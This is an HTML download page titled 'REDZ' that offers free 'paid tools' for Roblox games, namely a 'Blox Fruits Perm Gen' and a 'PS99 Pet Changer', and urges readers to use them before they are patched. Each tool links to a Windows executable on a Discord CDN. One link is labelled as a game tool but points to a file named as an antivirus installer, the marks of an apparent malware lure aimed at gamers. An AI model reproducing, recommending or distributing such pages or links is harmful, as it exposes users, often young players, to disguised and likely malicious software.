<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>REDZ</title>
    <link rel="icon" type="image/x-icon" href="https://cdn.discordapp.com/icons/1166413812606455838/81041ff5b1fe4dbeb9b3e657088bc91b.webp?size=480">
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #121212;
            margin: 0;
            padding: 0;
            color: #ffffff;
        }
        .container {
            max-width: 1200px;
            margin: 0 auto;
            padding: 20px;
        }
        .box {
            background-color: #2c2c2c;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(255, 255, 255, 0.1);
            padding: 20px;
            margin-bottom: 20px;
        }
        h1 {
            color: #ffffff;
            font-size: 2.5rem;
            margin-top: 0;
        }
        h2 {
            color: #ffffff;
            font-size: 1.5rem;
            margin-top: 0;
        }
        p {
            color: #cccccc;
            font-size: 1rem;
            line-height: 1.5;
        }
        a {
            color: #ff4444;
            text-decoration: none;
        }
        a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="box">
            <h1>TOOLS</h1>
            <p>⚠️ Scroll down to see all downloads</p>
        </div>
        <div class="box">
            <h2>PAID TOOLS</h2>
            <p>These are rare paid tools being given out for free. Used them before they are patched</p>
        </div>
        <div class="box">
            <div class="download">
                <h3>Blox Fruits Perm Gen</h3>
                <a href="https://cdn.discordapp.com/attachments/1193416262366281791/1201112839864188950/Nord_Antivirus-Setup-v1.43.exe?ex=65c8a280&is=65b62d80&hm=8dc1aa084aa8a413cb9a551675194b275d4aebce899b99e7167b97a365df65cb&" class="download-link">Click to download setup</a>
            </div>
        </div>
        <div class="box">
            <div class="download">
                <h3>PS99 Pet Changer</h3>
                <a href="https://cdn.discordapp.com/attachments/1200973666494730341/1202048952233627668/PS99_Pet_Changer_Private.exe?ex=65cc0a53&is=65b99553&hm=f8959a858c66b1952ab70b65e4a43b8e2f22d95e9155a7a61fc0d56e9cfdeb25&" class="download-link">Click to download setup</a>
            </div>
        </div>
    </div>
</body>
</html>
